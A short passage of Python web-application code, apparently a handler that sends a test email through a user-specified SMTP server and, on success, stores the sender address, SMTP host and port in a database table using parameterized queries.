if sendMail(subject, email, password, recipient, body, smtp, port) == 'ok':
cur = g.db
cur.execute("UPDATE sfmail SET email = ? WHERE id = 1", (email,))
cur.execute("UPDATE sfmail SET smtp = ? WHERE id = 1", (smtp,))
cur.execute("UPDATE sfmail SET port = ? WHERE id = 1", (port,))
g.db.commit()
status = {'status':'ok'}
else:
status = {'status':'bad','error':str(sendMail(subject, email, password, recipient, body, smtp, port))}
else: